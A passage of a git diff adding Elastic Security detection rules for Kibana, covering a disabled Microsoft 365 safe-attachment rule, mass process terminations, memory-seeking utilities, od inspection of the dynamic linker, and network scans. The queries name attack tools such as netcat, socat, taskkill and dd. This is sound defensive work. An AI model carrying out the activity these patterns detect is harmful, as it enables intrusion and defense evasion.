], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json new file mode 100644 index 00000000000..ffd6e920384 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_206.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", + "false_positives": [ + "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json new file mode 100644 index 00000000000..352aa4d6e6c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_108.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process and/or Service Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted, or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\") and\n not process.parent.name:osquerybeat.exe\n", + "references": [ + "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 108 + }, + "id": "035889c4-2686-4583-a7df-67f89c292f2c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json new file mode 100644 index 00000000000..ec5a45cf73a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations (stop, delete, or suspend) from the same host within a short time period.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process and/or Service Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted, or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\") and\n not process.parent.name:osquerybeat.exe\n", + "references": [ + "https://www.elastic.co/security-labs/luna-ransomware-attack-pattern" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 109 + }, + "id": "035889c4-2686-4583-a7df-67f89c292f2c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json new file mode 100644 index 00000000000..d458e12ecd0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_1.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for the execution of Unix utilities that may be leveraged as memory address seekers. Attackers may leverage built-in utilities to seek specific memory addresses, allowing for potential future manipulation/exploitation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Memory Seeking Activity", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"tail\" and process.args == \"-c\") or\n (process.name == \"cmp\" and process.args == \"-i\") or\n (process.name in (\"hexdump\", \"xxd\") and process.args == \"-s\") or\n (process.name == \"dd\" and process.args : (\"skip*\", \"seek*\"))\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "035a6f21-4092-471d-9cda-9e379f459b1e", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "035a6f21-4092-471d-9cda-9e379f459b1e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json new file mode 100644 index 00000000000..8fee74b35ac --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/035a6f21-4092-471d-9cda-9e379f459b1e_2.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Monitors for the execution of Unix utilities that may be leveraged as memory address seekers. Attackers may leverage built-in utilities to seek specific memory addresses, allowing for potential future manipulation/exploitation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Memory Seeking Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (process.name == \"tail\" and process.args == \"-c\") or\n (process.name == \"cmp\" and process.args == \"-i\") or\n (process.name in (\"hexdump\", \"xxd\") and process.args == \"-s\") or\n (process.name == \"dd\" and process.args : (\"skip*\", \"seek*\"))\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "035a6f21-4092-471d-9cda-9e379f459b1e", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "035a6f21-4092-471d-9cda-9e379f459b1e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json new file mode 100644 index 00000000000..4a16728f415 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_1.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for dynamic linker discovery via the od utility. od (octal dump) is a command-line utility in Unix operating systems used for displaying data in various formats, including octal, hexadecimal, decimal, and ASCII, primarily used for examining and debugging binary files or data streams. Attackers can leverage od to analyze the dynamic linker by identifying injection points and craft exploits based on the observed behaviors and structures within these files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Dynamic Linker Discovery via od", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name == \"od\" and process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json new file mode 100644 index 00000000000..5e99da927b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0369e8a6-0fa7-4e7a-961a-53180a4c966e_2.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for dynamic linker discovery via the od utility. od (octal dump) is a command-line utility in Unix operating systems used for displaying data in various formats, including octal, hexadecimal, decimal, and ASCII, primarily used for examining and debugging binary files or data streams. Attackers can leverage od to analyze the dynamic linker by identifying injection points and craft exploits based on the observed behaviors and structures within these files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Dynamic Linker Discovery via od", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"od\" and process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n)\n", + "references": [ + "https://github.com/arget13/DDexec" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "0369e8a6-0fa7-4e7a-961a-53180a4c966e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json new file mode 100644 index 00000000000..caca9fe3496 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Network Scan Executed From Host", + "query": "event.category:process and host.os.type:linux and event.action:(exec or exec_event or executed or process_started) and\nevent.type:start and process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "03c23d45-d3cb-4ad4-ab5d-b361ffe8724a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + } + ], + "threshold": { + "cardinality": [ + { + "field": "process.args", + "value": 100 + } + ], + "field": [ + "host.id", + "process.parent.entity_id", + "process.executable" + ], + "value": 1 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 3 + }, + "id": "03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json new file mode 100644 index 00000000000..d503d3c25e8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_109.json @@ -0,0 +1,152 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration.", + "false_positives": [ + "Trusted OpenSSH executable updates. It's recommended to verify the integrity of OpenSSH binary changes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of OpenSSH Binaries", + "note": 